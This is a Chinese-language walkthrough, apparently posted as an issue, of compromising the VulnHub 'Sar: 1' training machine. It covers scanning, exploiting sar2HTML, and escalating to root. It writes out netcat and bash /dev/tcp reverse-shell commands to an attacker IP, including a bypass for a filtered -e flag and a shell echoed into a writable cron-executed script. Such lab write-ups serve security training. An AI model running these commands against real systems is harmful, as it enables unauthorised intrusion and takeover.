Open cha0s32 opened 9 months ago
https://www.vulnhub.com/entry/sar-1,425/
进行全端口扫描,枚举目标的端口和服务
nmap -n -v -sS --max-retries=0 -p- 172.16.33.13
nmap -sV -p80 -A 172.16.33.13
只有80端口放通,扫描端口服务版本
访问web服务,发现是apache默认页面,无可用信息
apache
使用dirsearch对目录进行扫描,发现有敏感文件phpinfo.php和robots.txt
dirsearch
phpinfo.php
robots.txt
访问robots.txt,发现有sar2HTML, 访问一下
sar2HTML
使用searchsploit查询有无sar2HTML的漏洞利用代码,结果如下
searchsploit
看一下具体内容,其实py文件就是txt文件的代码实现,使用py脚本
py
txt
拿到普通权限,需要在远程主机弹一个shell回攻击机
尝试执行命令 nc 10.8.0.17 8888 -e /bin/bash,然后在攻击机上执行 nc -nvlp 8888
nc 10.8.0.17 8888 -e /bin/bash
nc -nvlp 8888
没有弹成功,怀疑是命令执行过滤了-e参数
-e
有两种思路可以绕过,都可以成功执行
第一为NC串联
> sar-command nc 10.8.0.17 6666 | /bin/bash | nc 10.8.0.17 8888 > kali > 开两个窗口 nc -nvlp 6666 # 用于输入命令 nc -nvlp 8888 # 用于输出结果
效果如下
第二种为对反弹shell进行编码
先用linpeas.sh脚本对提权信息进行收集
linpeas.sh
发现有一个计划任务可尝试利用
查看改脚本文件,发现执行的是另一个脚本文件write.sh,查看权限发现其可写可执行,尝试写shell
write.sh
echo "bash -c 'exec bash -i &>/dev/tcp/10.8.0.17/6666 >&1'" > write.sh
攻击机上监听 6666 端口,过一段时间即可获得 root 权限
靶机地址
https://www.vulnhub.com/entry/sar-1,425/
信息收集阶段
进行全端口扫描,枚举目标的端口和服务
只有80端口放通,扫描端口服务版本
访问web服务,发现是
apache默认页面,无可用信息使用
dirsearch对目录进行扫描,发现有敏感文件phpinfo.php和robots.txt访问
robots.txt,发现有sar2HTML, 访问一下利用漏洞拿shell
使用
searchsploit查询有无sar2HTML的漏洞利用代码,结果如下看一下具体内容,其实
py文件就是txt文件的代码实现,使用py脚本拿到普通权限,需要在远程主机弹一个shell回攻击机
尝试执行命令
nc 10.8.0.17 8888 -e /bin/bash,然后在攻击机上执行nc -nvlp 8888没有弹成功,怀疑是命令执行过滤了
-e参数有两种思路可以绕过,都可以成功执行
第一为NC串联
效果如下
第二种为对反弹shell进行编码
提权
先用
linpeas.sh脚本对提权信息进行收集发现有一个计划任务可尝试利用
查看改脚本文件,发现执行的是另一个脚本文件
write.sh,查看权限发现其可写可执行,尝试写shell攻击机上监听 6666 端口,过一段时间即可获得 root 权限